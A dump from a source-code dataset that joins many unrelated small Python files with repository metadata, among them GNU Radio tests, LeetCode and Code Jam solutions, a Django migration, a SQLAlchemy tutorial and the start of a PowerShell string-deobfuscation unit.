    three consecutive vector outputs of the configured length (2 here)."""

    def setUp (self):
        self.tb = gr.top_block ()

    def tearDown (self):
        self.tb = None

    def test_001_t (self):
        # set up fg
        # six samples -> expect three output vectors of two samples each
        data = ( complex(1,1),complex(2,2),complex(3,3),complex(4,4),complex(5,5),complex(6,6) )
        src = blocks.vector_source_c( data )
        test = radar.FMCW_separate_IQ_cc(2)
        snk1 = blocks.vector_sink_c(2)
        snk2 = blocks.vector_sink_c(2)
        snk3 = blocks.vector_sink_c(2)
        self.tb.connect(src,test)
        self.tb.connect((test,0),snk1)
        self.tb.connect((test,1),snk2)
        self.tb.connect((test,2),snk3)
        self.tb.run ()
        # check data
        # each sink should have received one contiguous pair, in order
        data1 = ( complex(1,1),complex(2,2) )
        data2 = ( complex(3,3),complex(4,4) )
        data3 = ( complex(5,5),complex(6,6) )
        self.assertTupleEqual(data1,snk1.data())
        self.assertTupleEqual(data2,snk2.data())
        self.assertTupleEqual(data3,snk3.data())
|
[
"stefan.wunsch@student.kit.edu"
] |
stefan.wunsch@student.kit.edu
|
e0935743f7688c9951a2d83812994aded07c6dba
|
ce378bf28153d4d30cd53ec8684e8017abd0ac59
|
/pythonProject/leetcode/Rotate Array.py
|
abac0295ceee22ace5ca239c758306f05baeca4e
|
[] |
no_license
|
zzong2006/coding-problems-study
|
5f006b39264cbe43d11db489ce8b716272329b6e
|
9b3affbeb2ddfa673c1d879fb865408e34955c5c
|
refs/heads/master
| 2023-04-07T12:47:41.646054
| 2021-04-08T05:02:33
| 2021-04-08T05:02:33
| 286,918,250
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 696
|
py
|
class Solution(object):
    def rotate(self, nums, k):
        """
        Rotate *nums* right by *k* positions in place via three reversals:
        reverse everything, reverse the first k, reverse the remaining n-k.

        :type nums: List[int]
        :type k: int
        :rtype: None Do not return anything, modify nums in-place instead.

        Fixes vs. original: debug print() calls removed, and an empty
        list no longer raises ZeroDivisionError on `k %= n`.
        """
        n = len(nums)
        if n == 0:
            return
        k %= n
        # reverse the whole list
        for i in range(n // 2):
            nums[i], nums[n - i - 1] = nums[n - i - 1], nums[i]
        # reverse the first k elements
        for i in range(k // 2):
            nums[i], nums[k - i - 1] = nums[k - i - 1], nums[i]
        # reverse the remaining n-k elements
        for i in range(k, (n + k - 1) // 2 + 1):
            nums[i], nums[n - i + k - 1] = nums[n - i + k - 1], nums[i]
# Ad-hoc manual check: rotate a 9-element list right by 3 positions.
a = Solution()
a.rotate([1, 2, 3, 4, 5, 6, 7, 8, 9], k=3)
|
[
"zzong2006@gmail.com"
] |
zzong2006@gmail.com
|
e2141bfbe1940d48e60d545306ad35b1aa55f3e8
|
60f3c767c9f1a700c9e67dac606b8ee3bc46450d
|
/example.py
|
bb8e0450c336caa9837456280eb09470e3379615
|
[] |
no_license
|
codesharedot/Quadratic-Line-Chart-Sandra
|
57b999e12d7ae20b3f907697b2f739c64a45db11
|
9e4eae6d10fc4001464a80de7c7cf5c4e2d6b115
|
refs/heads/master
| 2020-07-26T12:24:34.892400
| 2019-09-15T19:04:04
| 2019-09-15T19:04:04
| 208,642,944
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 147
|
py
|
import matplotlib.pyplot as plt
import numpy as np

# Plot y = 9x^2 over [-1, 1] as a thick cyan line and save it to chart.png.
x = np.linspace(-1, 1, 50)
y = 9*x*x
plt.plot(x, y,'c-',linewidth=10)
plt.savefig('chart.png')
|
[
"codeto@sent.com"
] |
codeto@sent.com
|
6796233cc8e0d68532199b60208872e887b79dbe
|
8af6f0195e94908482ca7236bcd2eae382605fa7
|
/python3code/chapter03/fibs.py
|
82488642ecd1ea7d7ff1edce7bf88be46820530f
|
[] |
no_license
|
MeatStack/StarterLearningPython
|
4a1e0fc94c4615022ba9ff41455c4e67bd16a5bd
|
98f0a9028f40db189cf2636a5e0c3abbcd86f71d
|
refs/heads/master
| 2020-03-23T16:21:02.884442
| 2018-07-21T11:24:11
| 2018-07-21T11:24:11
| 141,805,470
| 1
| 0
| null | 2018-07-21T11:15:42
| 2018-07-21T11:15:42
| null |
UTF-8
|
Python
| false
| false
| 191
|
py
|
# coding=utf-8
'''
filename: fibs.py
'''
def fibs(n):
    """Return the first *n* Fibonacci numbers as a list.

    Always contains at least the seed [0, 1], even for n < 2 (matching
    the original behavior).
    """
    sequence = [0, 1]
    while len(sequence) < n:
        sequence.append(sequence[-1] + sequence[-2])
    return sequence
# Demo: print the first ten Fibonacci numbers.
lst = fibs(10)
print(lst)
|
[
"qiwsir@gmail.com"
] |
qiwsir@gmail.com
|
641eb5e4ce8f4443864024b99da2a1c4b80e0d83
|
167face5e34f69ba36b8a8d93306387dcaa50d24
|
/15formatando_strings.py
|
1061eb1748036704fe55492e86c058ee0f7e4ae9
|
[] |
no_license
|
william-cirico/python-study
|
4fbe20936c46af6115f0d88ad861c71e6273db71
|
5923268fea4c78707fe82f1f609535a69859d0df
|
refs/heads/main
| 2023-04-19T03:49:23.237829
| 2021-05-03T01:24:56
| 2021-05-03T01:24:56
| 309,492,617
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 364
|
py
|
# Strings can be formatted in the following ways (tutorial: each print
# below shows a different formatting technique for the same values):
nome = "William Círico"
idade = 20
peso = 70.31287418293472
# 1) comma-separated arguments to print()
print("Nome: ", nome, "Idade: ", idade, "Peso: ", peso)
# 2) str.format with positional placeholders
print("Nome: {0} Idade: {1} Peso: {2}".format(nome, idade, peso))
# 3) str.format with named placeholders
print("Nome: {n} Idade: {i} Peso: {p}".format(n=nome, i=idade, p=peso))
# 4) f-string, with the weight limited to two decimal places
print(f"Nome: {nome} Idade: {idade} Peso: {peso:.2f}")
|
[
"contato.williamc@gmail.com"
] |
contato.williamc@gmail.com
|
17ebc93a0e4a5b9f3bdb7c23942b97a73909d91d
|
0bc4391986b15c706a77e5df314ec83e84375c54
|
/articles/migrations/0002_article_image_thumbnail.py
|
dd12130bb4ff92b2ae300134423a7f1d034fcd9b
|
[] |
no_license
|
ssshhh0402/django-crud
|
a6d1a0872942c6215b1130a44ae335182c42937d
|
da292c07c9f77526bee8cbbec07d37ea8464d6af
|
refs/heads/master
| 2022-05-02T12:07:26.518798
| 2019-09-23T06:26:43
| 2019-09-23T06:26:43
| 203,089,241
| 0
| 0
| null | 2022-04-22T22:11:46
| 2019-08-19T03:07:54
|
HTML
|
UTF-8
|
Python
| false
| false
| 443
|
py
|
# Generated by Django 2.2.4 on 2019-09-23 06:07
# NOTE: auto-generated migration — adds the optional `image_thumbnail`
# field to the Article model; do not edit by hand.

from django.db import migrations
import imagekit.models.fields


class Migration(migrations.Migration):

    dependencies = [
        ('articles', '0001_initial'),
    ]

    operations = [
        migrations.AddField(
            model_name='article',
            name='image_thumbnail',
            field=imagekit.models.fields.ProcessedImageField(blank=True, upload_to=''),
        ),
    ]
|
[
"ssshhh0402@naver.com"
] |
ssshhh0402@naver.com
|
df4e2b89e5e838494485cf479d6d0589536e3838
|
fa76cf45d7bf4ed533e5a776ecd52cea15da8c90
|
/robotframework-ls/src/robotframework_debug_adapter/vendored/force_pydevd.py
|
93bcca4fb794844f5a72a146f94071d71202e7a7
|
[
"Apache-2.0"
] |
permissive
|
martinRenou/robotframework-lsp
|
8a5d63b7cc7d320c9fed2372a79c8c6772d6481e
|
5f23b7374139e83d0aa1ebd30675e762d7a0db86
|
refs/heads/master
| 2023-08-18T22:26:01.386975
| 2021-10-25T13:46:11
| 2021-10-25T13:46:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,358
|
py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE in the project root
# for license information.
from __future__ import absolute_import, division, print_function, unicode_literals
import contextlib
from importlib import import_module
import os
import sys
VENDORED_ROOT = os.path.dirname(os.path.abspath(__file__))
def project_root(project):
    """Return the path to the root dir of the vendored project.

    If "project" is falsy (empty string or None) the path prefix for
    vendored projects (e.g. "robotframework_debug_adapter/_vendored/")
    is returned.
    """
    return os.path.join(VENDORED_ROOT, project or "")
@contextlib.contextmanager
def vendored(project, root=None):
    """A context manager under which the vendored project will be imported."""
    root = project_root(project) if root is None else root
    # Prepend so the vendored copy shadows any installed version.
    sys.path.insert(0, root)
    try:
        yield root
    finally:
        sys.path.remove(root)
def preimport(project, modules, **kwargs):
    """Import each of the named modules out of the vendored project."""
    with vendored(project, **kwargs):
        for module_name in modules:
            import_module(module_name)
# Prefer an already-installed pydevd; fall back to the vendored copy.
try:
    import pydevd  # noqa
except ImportError:
    pydevd_available = False
else:
    pydevd_available = True

if not pydevd_available:
    # Constants must be set before importing any other pydevd module
    # # due to heavy use of "from" in them.
    with vendored("vendored_pydevd"):
        try:
            pydevd_constants = import_module("_pydevd_bundle.pydevd_constants")
        except ImportError as e:
            # Make the failure diagnosable: list what the vendored dir
            # actually contains before re-raising.
            contents = os.listdir(VENDORED_ROOT)
            for c in contents[:]:
                if os.path.isdir(c):
                    contents.append(f"{c}/{os.listdir(c)}")
                else:
                    contents.append(c)
            s = "\n".join(contents)
            msg = f"Vendored root: {VENDORED_ROOT} -- contents:\n{s}"
            raise ImportError(msg) from e

    # Now make sure all the top-level modules and packages in pydevd are
    # loaded. Any pydevd modules that aren't loaded at this point, will
    # be loaded using their parent package's __path__ (i.e. one of the
    # following).
    preimport(
        "vendored_pydevd",
        [
            "_pydev_bundle",
            "_pydev_imps",
            "_pydev_runfiles",
            "_pydevd_bundle",
            "_pydevd_frame_eval",
            "pydev_ipython",
            "pydevd_concurrency_analyser",
            "pydevd_plugins",
            "pydevd",
        ],
    )

import pydevd  # noqa

# Ensure that pydevd uses JSON protocol by default.
from _pydevd_bundle import pydevd_constants
from _pydevd_bundle import pydevd_defaults

pydevd_defaults.PydevdCustomization.DEFAULT_PROTOCOL = (
    pydevd_constants.HTTP_JSON_PROTOCOL
)

# Share one DAP message-id space between the robot adapter and pydevd so
# ids from either side never collide.
from robocorp_ls_core.debug_adapter_core.dap.dap_base_schema import (
    BaseSchema as RobotSchema,
)
from _pydevd_bundle._debug_adapter.pydevd_base_schema import BaseSchema as PyDevdSchema

PyDevdSchema._obj_id_to_dap_id = RobotSchema._obj_id_to_dap_id
PyDevdSchema._dap_id_to_obj_id = RobotSchema._dap_id_to_obj_id
PyDevdSchema._next_dap_id = RobotSchema._next_dap_id
|
[
"fabiofz@gmail.com"
] |
fabiofz@gmail.com
|
de560c64ba52aaecaeac7ec15a5ce04eb115991c
|
afc8d5a9b1c2dd476ea59a7211b455732806fdfd
|
/Configurations/VBSjjlnu/Full2018v7/conf_test_fatjetscale_DY/configuration.py
|
586bc0ae5cf8cc622910ab866255e792b1b7f1ac
|
[] |
no_license
|
latinos/PlotsConfigurations
|
6d88a5ad828dde4a7f45c68765081ed182fcda21
|
02417839021e2112e740607b0fb78e09b58c930f
|
refs/heads/master
| 2023-08-18T20:39:31.954943
| 2023-08-18T09:23:34
| 2023-08-18T09:23:34
| 39,819,875
| 10
| 63
| null | 2023-08-10T14:08:04
| 2015-07-28T07:36:50
|
Python
|
UTF-8
|
Python
| false
| false
| 950
|
py
|
# Configuration file to produce initial root files -- has both merged and binned ggH samples
treeName = 'Events'
# tag used to suffix all the output directories below
tag = 'DY2018_v7'
# used by mkShape to define output directory for root files
outputDir = 'rootFile'+tag
# file with TTree aliases
aliasesFile = 'aliases.py'
# file with list of variables
variablesFile = 'variables.py'
# file with list of cuts
cutsFile = 'cuts.py'
#cutsFile = 'cuts_topCR.py'
# file with list of samples
samplesFile = 'samples.py'
# file with plot definitions (note: not samples -- original comment was a copy-paste)
plotFile = 'plot.py'
# luminosity to normalize to (in 1/fb)
lumi = 59.74
# used by mkPlot to define output directory for plots
# different from "outputDir" to do things more tidy
outputDirPlots = 'plots'+tag
# used by mkDatacards to define output directory for datacards
outputDirDatacard = 'datacards'
# structure file for datacard
structureFile = 'structure.py'
# nuisances file for mkDatacards and for mkShape
nuisancesFile = 'nuisances.py'
|
[
"davide.valsecchi@cern.ch"
] |
davide.valsecchi@cern.ch
|
6300090e5a1167be972d853d145e04125121895d
|
ccbcaca6df1c3984a19f039351e29cfa81e73314
|
/timetable/schedule.py
|
a3265c9ffcaa2c76a8c6866709dc7413cf0e18ea
|
[
"BSD-3-Clause"
] |
permissive
|
pgromano/timetable
|
b96c6eb2da8ede8abfa211f6d54748a4a5a9c9c7
|
8fa83fa82bb2afc56f6da1b7f8e3836f2b127164
|
refs/heads/master
| 2021-01-21T00:22:17.376372
| 2016-08-17T14:57:25
| 2016-08-17T14:57:25
| 61,254,584
| 0
| 0
| null | 2016-06-16T02:07:07
| 2016-06-16T02:07:07
| null |
UTF-8
|
Python
| false
| false
| 182
|
py
|
class Schedule(object):
    """Student schedule object.

    Holds the courses a student is enrolled in, in insertion order.
    """

    def __init__(self):
        """Create an empty schedule."""
        # Fix: the original file was syntactically invalid (empty method
        # bodies and a truncated ``def courses``); courses are stored here.
        self._courses = []

    def add(self, course):
        """Add course to schedule"""
        self._courses.append(course)

    @property
    def courses(self):
        """Return the list of courses currently on the schedule."""
        return self._courses
|
[
"zachsailer@gmail.com"
] |
zachsailer@gmail.com
|
507318a00b41ce38db963c43532b962a36ca4c43
|
f3bd271bf00325881fb5b2533b9ef7f7448a75ec
|
/classes/_print32.py
|
fed133646d96b60d6083b2f83a8360c33eb35250
|
[] |
no_license
|
obaica/xcp2k
|
7f99fc9d494859e16b9b0ea8e217b0493f4b2f59
|
6e15c2c95658f545102595dc1783f5e03a9e6916
|
refs/heads/master
| 2020-07-15T17:27:43.378835
| 2019-02-11T16:32:24
| 2019-02-11T16:32:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 659
|
py
|
from xcp2k.inputsection import InputSection
from _program_run_info23 import _program_run_info23
from _restart10 import _restart10
from _restart_history4 import _restart_history4
from _current1 import _current1
class _print32(InputSection):
    """Auto-generated binding for the CP2K "PRINT" input section."""
    def __init__(self):
        InputSection.__init__(self)
        # Child section objects, one per CP2K subsection.
        self.PROGRAM_RUN_INFO = _program_run_info23()
        self.RESTART = _restart10()
        self.RESTART_HISTORY = _restart_history4()
        self.CURRENT = _current1()
        self._name = "PRINT"
        # Maps Python attribute names to CP2K keyword names.
        self._subsections = {'CURRENT': 'CURRENT', 'RESTART_HISTORY': 'RESTART_HISTORY', 'PROGRAM_RUN_INFO': 'PROGRAM_RUN_INFO', 'RESTART': 'RESTART'}
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
31fa6cf28dee74da3917221dcc286b6239f35fdc
|
d5ba475a6a782b0eed5d134b66eb8c601c41421c
|
/terrascript/data/template.py
|
a964634d94047ba5352fbbb1a6371b1e8858546a
|
[
"BSD-2-Clause",
"Python-2.0"
] |
permissive
|
amlodzianowski/python-terrascript
|
ab42a06a5167e53ad8093b656a9bf14a03cb031d
|
142b1a4d1164d1012ac8865d12fdcc72f1e7ae75
|
refs/heads/master
| 2021-05-19T11:59:47.584554
| 2020-03-26T07:13:47
| 2020-03-26T07:13:47
| 251,688,045
| 0
| 0
|
BSD-2-Clause
| 2020-03-31T18:00:22
| 2020-03-31T18:00:22
| null |
UTF-8
|
Python
| false
| false
| 233
|
py
|
# terrascript/data/template.py
import terrascript
class template_file(terrascript.Data):
    # Binding for the Terraform "template_file" data source.
    pass
class template_cloudinit_config(terrascript.Data):
    # Binding for the Terraform "template_cloudinit_config" data source.
    pass
# Public API of this generated module.
__all__ = [
    "template_file",
    "template_cloudinit_config",
]
|
[
"markus@juenemann.net"
] |
markus@juenemann.net
|
3e14d69378a30d8887db254aeede0f54138ce747
|
781e2692049e87a4256320c76e82a19be257a05d
|
/all_data/exercism_data/python/matrix/4d38ab06972046a988250a3005464d09.py
|
03b161fe26511da6e0ce058e59c662bf8f099254
|
[] |
no_license
|
itsolutionscorp/AutoStyle-Clustering
|
54bde86fe6dbad35b568b38cfcb14c5ffaab51b0
|
be0e2f635a7558f56c61bc0b36c6146b01d1e6e6
|
refs/heads/master
| 2020-12-11T07:27:19.291038
| 2016-03-16T03:18:00
| 2016-03-16T03:18:42
| 59,454,921
| 4
| 0
| null | 2016-05-23T05:40:56
| 2016-05-23T05:40:56
| null |
UTF-8
|
Python
| false
| false
| 488
|
py
|
class Matrix(object):
    """Parse a newline/whitespace-delimited string of integers into a matrix.

    The input has one row per line with whitespace-separated values, e.g.
    ``"1 2\n3 4"``. Exposes the parsed ``rows`` and the transposed
    ``columns``, both as lists of lists of ints.
    """

    def __init__(self, init):
        # Python 3 fix: the original relied on Python 2's ``map`` returning
        # lists; on Python 3 the map objects could not be indexed when
        # building ``columns``. Plain comprehensions produce real lists.
        self.rows = [[int(token) for token in line.split()]
                     for line in init.split('\n')]
        # Transpose: column i collects the i-th element of every row.
        self.columns = [[row[i] for row in self.rows]
                        for i in range(len(self.rows[0]))]
|
[
"rrc@berkeley.edu"
] |
rrc@berkeley.edu
|
91357c211e5073d5b50569facfbbda0b406a9886
|
167c6226bc77c5daaedab007dfdad4377f588ef4
|
/python/ql/test/library-tests/variables/scopes/test.py
|
940576d44dfe9eff4e4399fd52b40809619cecb7
|
[
"MIT",
"LicenseRef-scancode-python-cwi",
"LicenseRef-scancode-other-copyleft",
"GPL-1.0-or-later",
"LicenseRef-scancode-free-unknown",
"Python-2.0"
] |
permissive
|
github/codeql
|
1eebb449a34f774db9e881b52cb8f7a1b1a53612
|
d109637e2d7ab3b819812eb960c05cb31d9d2168
|
refs/heads/main
| 2023-08-20T11:32:39.162059
| 2023-08-18T14:33:32
| 2023-08-18T14:33:32
| 143,040,428
| 5,987
| 1,363
|
MIT
| 2023-09-14T19:36:50
| 2018-07-31T16:35:51
|
CodeQL
|
UTF-8
|
Python
| false
| false
| 987
|
py
|
global0 = 0
global1 = 1
# NOTE: this module is a CodeQL library-test fixture for variable-scope
# analysis. The unusual constructs below (bare name statements, the
# undefined global `seq` in func6, loop variables reusing comprehension
# names) are intentional test inputs and must not be "fixed".
def func0(param0, param1):
    return param0 + param1
def func1():
    global global0, global_local
    local0 = 0
    local1 = 1
    global_local
    global0 = local0 + local1 + global1
def func2():
    local2 = 2
    def inner1(param2):
        local3 = local2
        return local3
    return inner1
def func3(param4, param5):
    local4 = 4
    def inner_outer():
        def inner2(param3):
            return local5 + local4 + param3 + param4
        local5 = 3
        return inner2(local4 + param4 + param5)
class C(base):
    class_local = 7
    def meth(self):
        mlocal = self
        return mlocal
def func4(param6):
    class Local:
        def meth_inner(self):
            return param6
    return Local()
def func5(seq):
    return [x for x in seq]
def func6(y, z):
    return [y+z for y in seq]
#FP observed in sembuild
def use_in_loop(seq):
    [v for v in range(3)]
    for v in seq:
        v #x redefined -- fine in 2 and 3.
|
[
"mark@hotpy.org"
] |
mark@hotpy.org
|
35b5605675d38e47f6e9113f00cec7ad47b2cd14
|
39d26bedd4049d58265fcd6c480cc7a5b73c7ece
|
/Tutorial_SimpleTeacherAPI/python-sample-code/tests/conftest.py
|
5698513372a065217fe1f856dfe1735a2f254317
|
[] |
no_license
|
sramirezh/Developing
|
7adc6dbb5c8436db6a3ab125018186ea7bdd1b40
|
a07ed07899911b9860830f9498c08144c4eca3d4
|
refs/heads/master
| 2022-11-08T01:43:05.755215
| 2021-08-23T03:57:39
| 2021-08-23T03:57:39
| 249,786,342
| 0
| 1
| null | 2022-10-24T21:02:22
| 2020-03-24T18:26:46
|
Python
|
UTF-8
|
Python
| false
| false
| 281
|
py
|
import pytest
@pytest.fixture
def basic_tree():
    """Key/label pairs used to populate a tree in the tests."""
    # Same values and order as before, expressed as (n, str(n)) pairs.
    return [(key, str(key))
            for key in (23, 4, 30, 11, 7, 34, 20, 24, 22, 15, 1)]
|
[
"sramirez.hinestrosa@gmail.com"
] |
sramirez.hinestrosa@gmail.com
|
5ada850496b766d56da6dc90b7d634e1aa9f19c4
|
1cf3a339c0f94bce94cf142fde9a9f6ab38369a8
|
/yt_arch/core/api_client.py
|
226b998e4c8765b26d726b26d53496c6d0694b0e
|
[
"MIT"
] |
permissive
|
hilbertqqc/youtube-playlist-archiver
|
959f9afc541c293ff05b37b99833f640d39f4c2a
|
69727075e0151d03259c373647278312b11f0299
|
refs/heads/master
| 2023-03-24T03:34:36.507215
| 2021-03-17T20:57:48
| 2021-03-17T20:57:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 235
|
py
|
import httpapiclient
from httpapiclient.mixins import JsonResponseMixin, HelperMethodsMixin
class ApiClient(JsonResponseMixin, HelperMethodsMixin, httpapiclient.BaseApiClient):
    # HTTP client for the YouTube Data API v3. The mixins add JSON response
    # decoding and convenience request methods; all request paths are
    # resolved against this base URL.
    base_url = 'https://www.googleapis.com/youtube/v3/'
|
[
"dbashkatov@gmail.com"
] |
dbashkatov@gmail.com
|
243ef68fe11d18e22369979cd2bf46125b0e0df8
|
c97fc7658c39feb51c0ed42c04783797c8675b8a
|
/2018/pcy1/day12_mysql/orm8_fk3_update.py
|
8e4124a903201d0e359e84c71a75f1bf66cd9c77
|
[] |
no_license
|
githubvit/study
|
8bff13b18bea4954e8ed1b4619a091b134b8ff97
|
845e19d1225f1aa51c828b15effac30be42fdc1b
|
refs/heads/master
| 2023-02-20T15:59:19.635611
| 2021-12-15T08:30:54
| 2021-12-15T08:30:54
| 241,928,274
| 1
| 1
| null | 2023-02-02T06:18:48
| 2020-02-20T16:08:06
|
Python
|
UTF-8
|
Python
| false
| false
| 2,731
|
py
|
#_*_coding:utf-8_*_
'''
8. Foreign keys (foreign key)
8.3 Updating data
The stu_id column of the study_record attendance table was NULL when the
rows were inserted; this script backfills it.
'''
from sqlalchemy import create_engine,ForeignKey,bindparam
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, Integer, String,DATE,Enum
from sqlalchemy.orm import sessionmaker
# 1. Connect to the database
engine = create_engine("mysql+pymysql://root:another333@localhost/test_db",
                       encoding='utf-8',echo=True)
# mysql+pymysql means raw SQL is executed through the pymysql driver;
# echo=True logs engine activity so the generated SQL can be inspected.
# 2. Map tables to classes
Base = declarative_base() # create the ORM base class
class Student(Base): # student table
    __tablename__='student'
    id=Column(Integer,primary_key=True)
    name=Column(String(32),nullable=False)
    register_date=Column(DATE,nullable=False)
class StudyRecody(Base): # attendance table (the "Recody" typo is kept: it is the public class name)
    __tablename__='study_record'
    id=Column(Integer,primary_key=True)
    day=Column(Integer,nullable=False)
    status=Column(String(32),nullable=False)
    # 3. Foreign key referencing student.id
    stu_id=Column(Integer,ForeignKey('student.id'))
# 3. Create a session with the database (analogous to a file handle).
Session_class = sessionmaker(bind=engine) # note: this returns a session *class*, not an instance
session = Session_class() # instantiate a session
# 4. Update the attendance table: update() driven by a list of dicts.
# Batch-update approach: update() with a where() clause whose parameter is
# bound via bindparam (imported above for exactly this purpose).
session.execute(
    StudyRecody.__table__.update().where(StudyRecody.id==bindparam('b_id')),
    [ {'b_id':1,'day':1,'status':'yes','stu_id':1},
      {'b_id':2,'day':1,'status':'yes','stu_id':2},
      {'b_id':3,'day':1,'status':'no','stu_id':3},
      {'b_id':4,'day':2,'status':'no','stu_id':1},
    ]
)
'''UPDATE study_record SET day=%(day)s, status=%(status)s WHERE study_record.id = %(b_id)s
这是批量修改的方法,execute可以执行多条数据插入或更新,但是数据的格式必须相同,不可以像:
[{'b_id':1,'day':1,'status':'yes'},
 {'b_id':3,'status':'no'}]
这样无法执行,因为第2条需要的原生sql和第一条是不同的'''
'''
上面的执行结果如下:
mysql> select * from study_record;
+----+-----+--------+--------+
| id | day | status | stu_id |
+----+-----+--------+--------+
| 1 | 1 | yes | 1 |
| 2 | 1 | yes | 2 |
| 3 | 1 | no | 3 |
| 4 | 2 | no | 1 |
+----+-----+--------+--------+
4 rows in set (0.00 sec)
mysql>
'''
session.commit()
|
[
"sgq523@163.com"
] |
sgq523@163.com
|
f940bcf1ea682999bed19fc60ca0f4af0c8a6610
|
6b2a8dd202fdce77c971c412717e305e1caaac51
|
/solutions_5695413893988352_1/Python/sempav/b.py
|
8ad8a3ac5ec44bbc0fd72c27fcc7cc57a5f07a7f
|
[] |
no_license
|
alexandraback/datacollection
|
0bc67a9ace00abbc843f4912562f3a064992e0e9
|
076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf
|
refs/heads/master
| 2021-01-24T18:27:24.417992
| 2017-05-23T09:23:38
| 2017-05-23T09:23:38
| 84,313,442
| 2
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,416
|
py
|
# Per-digit markers: which of the two scores has a '?' at this position.
POS = 1
NEG = 2
BOTH = 3
NONE = 0
# Best solution found so far; module-level state mutated by check().
ans_c = ''
ans_j = ''
ans_diff = 10**20
def extract_num(score_str):
    """Read *score_str* as a decimal number, counting '?' characters as 0."""
    value = 0
    for place, ch in enumerate(reversed(score_str)):
        if ch != '?':
            value += (ord(ch) - ord('0')) * 10 ** place
    return value
def check(diff, ans, positions, score_c, score_j):
    """Materialize the digit-delta assignment *ans* and keep it if it beats
    the best answer found so far.

    *diff* is the remaining (J - C) difference for this assignment; a smaller
    |diff| wins, ties broken by the smaller C score, then the smaller J score.
    Updates the module-level best (ans_c, ans_j, ans_diff).
    """
    global ans_c
    global ans_j
    global ans_diff
    if abs(diff) > abs(ans_diff):
        return
    c_str = ''
    j_str = ''
    for d, p, c, j in zip(ans, positions, score_c, score_j):
        if p == NONE:
            # Both digits known: copy them through unchanged.
            c_str += c
            j_str += j
        elif p == BOTH:
            # Both digits unknown: the signed delta d is split so one side
            # carries |d| and the other carries 0.
            if d >= 0:
                c_str += str(d)
                j_str += '0'
            else:
                c_str += '0'
                j_str += str(-d)
        elif p == POS:
            # Only C's digit is unknown.
            c_str += str(d)
            j_str += j
        else: # p == NEG:
            # Only J's digit is unknown.
            c_str += c
            j_str += str(-d)
    if abs(diff) < abs(ans_diff):
        ans_diff = diff
        ans_c = c_str
        ans_j = j_str
    elif abs(diff) == abs(ans_diff):
        # Tie on |diff|: prefer the numerically smaller C, then smaller J.
        c_int = int(c_str)
        j_int = int(j_str)
        ans_c_int = int(ans_c)
        ans_j_int = int(ans_j)
        if c_int < ans_c_int:
            ans_c = c_str
            ans_j = j_str
        elif c_int == ans_c_int and j_int < ans_j_int:
            ans_c = c_str
            ans_j = j_str
def solve(i, ans, diff, positions, score_c, score_j):
    """Recursively choose a digit delta for position *i*.

    Only the two candidate deltas whose contributions bracket the remaining
    difference *diff* can be optimal, so the recursion branches at most
    twice per '?' position; complete assignments are scored via check().
    """
    if i == len(positions):
        check(diff, ans, positions, score_c, score_j)
        return
    pow10 = 10 ** (len(positions) - i - 1)
    if positions[i] == NONE:
        # Nothing unknown here; the delta is forced to 0.
        ans[i] = 0
        solve(i + 1, ans, diff, positions, score_c, score_j)
        return
    # Allowed delta range depends on which side has the '?' at this position.
    if positions[i] == POS:
        cur_range = range(0, 10)
    elif positions[i] == NEG:
        cur_range = range(-9, 1)
    elif positions[i] == BOTH:
        cur_range = range(-9, 10)
    #print(positions[i], diff, list(cur_range))
    # First bracketing candidate (scan upward, clamp into range).
    just_above = cur_range[-1]
    for digit in cur_range:
        if diff - pow10 * digit == 0:
            just_above = digit
            break
        if diff - pow10 * digit < 0:
            just_above = digit - 1
            break
    if just_above not in cur_range:
        just_above = cur_range[0]
    # Second bracketing candidate (scan downward, clamp into range).
    just_below = cur_range[0]
    for digit in reversed(cur_range):
        if diff - pow10 * digit == 0:
            just_below = digit
            break
        if diff - pow10 * digit > 0:
            just_below = digit + 1
            break
    if just_below not in cur_range:
        just_below = cur_range[-1]
    # Recurse on both candidates, reusing the shared ans buffer.
    ans[i] = just_below
    solve(i + 1, ans, diff - pow10 * just_below, positions, score_c, score_j)
    ans[i] = just_above
    solve(i + 1, ans, diff - pow10 * just_above, positions, score_c, score_j)
# Driver: read T test cases, each a pair of digit strings with '?' holes,
# and print the filled-in scores that minimize |C - J|.
t = int(input())
for testCase in range(1, t + 1):
    score_c, score_j = input().split()
    # Reset the module-level best answer for this test case.
    ans_c = ''
    ans_j = ''
    ans_diff = 10**20
    a = extract_num(score_c)
    b = extract_num(score_j)
    # Classify each digit position by which score has a '?' there.
    positions = []
    for ch_a, ch_b in zip(score_c, score_j):
        if ch_a == '?' and ch_b == '?':
            positions.append(BOTH)
        elif ch_a == '?':
            positions.append(POS)
        elif ch_b == '?':
            positions.append(NEG)
        else:
            positions.append(NONE)
    ans = [0 for tmp in score_c]
    solve(0, ans, b - a, tuple(positions), score_c, score_j)
    print('Case #{}: {} {}'.format(testCase, ans_c, ans_j))
|
[
"alexandra1.back@gmail.com"
] |
alexandra1.back@gmail.com
|
e815bc00ac8a9f39a473d1ae169a929143560be6
|
c93f51492cfee3f98040f07d7f4323ec27ac81a5
|
/refinery/units/obfuscation/ps1/concat.py
|
40bc8a8c7d142f8dcdff27d0265cce17adba6673
|
[
"BSD-3-Clause"
] |
permissive
|
prats84/refinery
|
cbe9ebfeb570c9c0531e13bbf13ec18801f12aca
|
5f961051e9cc1857a06108ce4d36a6799ac9d720
|
refs/heads/master
| 2023-07-13T02:32:04.998285
| 2021-08-20T09:08:01
| 2021-08-20T09:08:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,398
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import re
from .. import IterativeDeobfuscator
from . import string_unquote, string_quote, Ps1StringLiterals
class deob_ps1_concat(IterativeDeobfuscator):
    """Iteratively merges adjacent PowerShell string literals that are
    joined with the concatenation operators ``+`` or ``&``."""

    # Matches a closing quote, a + or & operator, and an opening quote.
    _SENTINEL = re.compile(R'''['"]\s*[+&]\s*['"]''')

    def deobfuscate(self, data):
